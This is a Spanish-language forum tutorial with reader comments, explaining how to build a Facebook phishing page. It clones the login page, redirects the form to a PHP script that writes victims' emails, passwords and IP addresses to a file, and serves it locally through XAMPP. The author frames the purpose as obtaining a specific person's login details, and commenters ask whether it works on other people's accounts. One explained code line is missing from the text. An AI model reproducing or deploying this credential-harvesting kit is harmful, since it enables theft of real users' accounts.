Phishing Facebook [Re Fácil]

Alrededor de toda la web existen infinitas páginas falsas de redes sociales,  cuentas de correo electrónico y más, si bien es cierto que estas páginas no duran mucho tiempo colgadas en la red, a cada instante salen más y más de estas falsedades.


Como es de imaginarse, el servicio en línea con una gran cantidad de páginas de phishing es Facebook, y era de esperarse, quien alguna vez no ha querido saber los datos de ingreso de una persona en concreto, y digo en concreto porque este artículo se limitará a la realización de la página y a colgarla en un servidor de Apache simulado, con esto me refiero a que funcionará solo en su computador... (Más detalles abajo).


Se requiere:

-Conexión a Internet

-XAMPP [descarga] [software libre], sugiero bajarlo de la página principal

Opcional:

-Notepad++ [descarga] [software libre] sugiero bajarlo de la página principal


Recomendación: USAR GOOGLE CHROME


Ejecución:

Instalar XAMPP (re fácil: doble clic/si/esperar/siguiente/siguiente/siguiente/?una cagada se siguientes?/aceptar los términos que nadie lee/siguiente/instalar/esperar.)

Opcional: Instalar Notapad++ de la misma manera que el anterior


 Configuración de XAMPP para simular el servidor:

Una vez instalado, ejecutar la aplicación, para evitar muchos errores: en Windows ejecutarlo como administrador.

En el apartado de Apache dar clic en Start, estar pendiente a la lista de estados que se encuentra en la parte inferior del programa; para si en un caso se muestran errores de puerto [errores pintados de rojo], entonces es porque otra aplicación está usando el puerto que XAMPP utiliza para su funcionamiento, como solución dar clic en el botón Config/Apache(httpd.config), se abrirá el editor de texto asociado con *.txt (en Windows puede ser el bloc de notas), dentro de éste, ubicar las líneas:


#Listen 0.0.0.0:80

#Listen [::]:80

Listen 80


Las líneas que contienen # al inicio son comentarios, por lo que su edición no importa mucho pero por cuestiones de orden recomiendo editarlas según lo que se establecerá?

El número 80 corresponde al puerto que XAMPP utiliza, y como dije, en el caso de haber errores es porque este puerto está siendo utilizado por otra aplicación, por lo que estas líneas deben ser editas, se puede poner cualquier número (racionalmente NO MUY GRANDE), en mi caso lo tengo como:


#Listen 0.0.0.0:8080

#Listen [::]:8080

Listen 8080


Hecho esto, guardar el archivo (Archivo/Guardar).


Si no se deja:

Guardar el archivo en otro directorio, asegurarse que el nombre de archivo sea httpd y la extensión: conf.

Nombre: httpd.conf

CERRAR XAMPP COMPLETAMENTE (ver bandeja de sistema). Copiar el archivo y reemplazarlo en el directorio de Apache apartado conf, dentro del  directorio de instalación de XAMPP (directorio de XAMPapacheconf).

Volver a ejecutar la aplicación (recomendación: ejecutarla como administrador).


Si es que si se dejó:

Reiniciar XAMPP [CERRAR XAMPP COMPLETAMENTE y volver a ejecutarlo (recomendación: ejecutarla como administrador)].


Proceder a hacer clic en Start dentro de la fila Apache, esperar unos minutos hasta que el mensaje devuelto por el programa dentro de la lista de estados sea:


Hora   [Apache]   Status change detected: running


Para probar el funcionamiento correcto del servidor simulado escribir en la caja de texto de direcciones web en el navegador:

localhost:puerto_elegido

En mi caso:

localhost:8080

Se mostrará una página blanca con el título XAMPP y una selección de idiomas, escoger Español.


 Realización de la página falsa:

Como lo que se quiere es hacer phishing de Facebook que mejor que el propio Facebook para obtener la interfaz gráfica.

Abrir Facebook, y guardar la página de inicio de sesión en un directorio exclusivo para este objetivo.

Teniendo lista la descarga de la página, ingresar al adirectorio de descarga, hacer clic derecho sobre el archivo de extensión *.htm y Edit with Notepad++.

Se abrirá la aplicación con el código de la página de inicio de sesión de FB.

Hay que empezar a cambiar cosas y programar un poco.

Realizar una búsqueda dentro del código con el criterio: id="login_form" que hace referencia al típico botón log in la línea buscada debe estar entre algo parecido a esto:

? <form id="login_form" action="https://www.facebook.com/login.php?login_attempt=1" method="post" ?

Indicaré ciertos pasos que refieren a programación y después explicaré que es lo que se está haciendo con los códigos.

Cambiar la línea action="https://www.facebook.com/login.php?login_attempt=1" por action="post.php" quedando:

? <form id="login_form" action="post.php" method="post" ?

Con esto hemos hecho que el botón log in no redireccione a los servidores de inicio de sesión de Facebook, sino que llame a un archivo post de extensión*.php donde se capturarán el usuario y la contraseña del desafortunado adicto a Facebook.

Guardar los cambios realizados (clic en el botón con icono de Diskette).

En la misma carpeta donde están los archivos descargados, crear un bloc de notas con el nombre post (este archivo, por defecto, tendrá extensión *.txt, pero luego se le cambiará) y dentro de éste escribir las siguientes líneas de código:

<?php

$habbo=$_POST['email'];

$password=$_POST['pass'];

$ip = $_SERVER ['REMOTE_ADDR'];

$f = fopen ("Claves.html","a");

fwrite($f, 'Email: [<font color = "#0000FF">'.$habbo.'</font>] Password:[<font color = "#0000FF">'.$password.'</font>] [br /]');

fclose($f);


?>


 La línea:

$f = fopen ("Claves.html","a");

Crea un archivo de extensión html donde almacenarán los datos capturados por post.php, este archivo se llama Claves.html, pero el nombre puede ser cambiado.


La línea:


Indica que después de haber capturado los datos de ingreso de un usuario, se redireccionará hacia la página en la que Facebook te dice que ingresaste mal tus datos.

Luego ir a Archivo/Guardar Como/ y escribir:

Nombre: post.php

Tipo: Todos los archivos

Guardar


Llegado a este punto, en la carpeta donde se ha estado trabajando debe haber:

Una subcarpeta que contiene algunas cosas de la interfaz y código de Facebook.

Un archivo de extensión htm que es la página de inicio de sesión de Facebook.

Un archivo post.php que captura los datos de ingreso.

Copiar esta carpeta en:

Directorio de XAMPPhtdocs

Ahora, para acceder a esta página falsa recién creada, escribir en la barra de direcciones del navegador:

localhost:puerto_elegido/nombre_carpeta/

En mi caso:

localhost:8080/FB/

Escribir estupideces en las cajas de texto de inicio de seción de Facebook y dar clic en Log in, ir a la carpeta Directorio de XAMPPhtdocs buscar el archivo Claves.html o como haya sido el nombre que tenga, abrirlo y ver los resultados.


¡¡Listo!! Debió haber funcionado.
Phishing Facebook [Re Fácil]
10 Puntos Score: 10/10
Visitas: 7803 Favoritos: 12
Ver los usuarios que votaron...
4 Comentarios Phishing Facebook [Re Fácil]
Te doy mas 10 por el Copy paste.  
tio probaressi enverdad funciona con mi propia cuenta y luego comento
este metodo sirve para entrar al facebook de otra persona sin saber la contrase?
Para dejar un comentario Registrate! o.. eres ya usuario? Accede!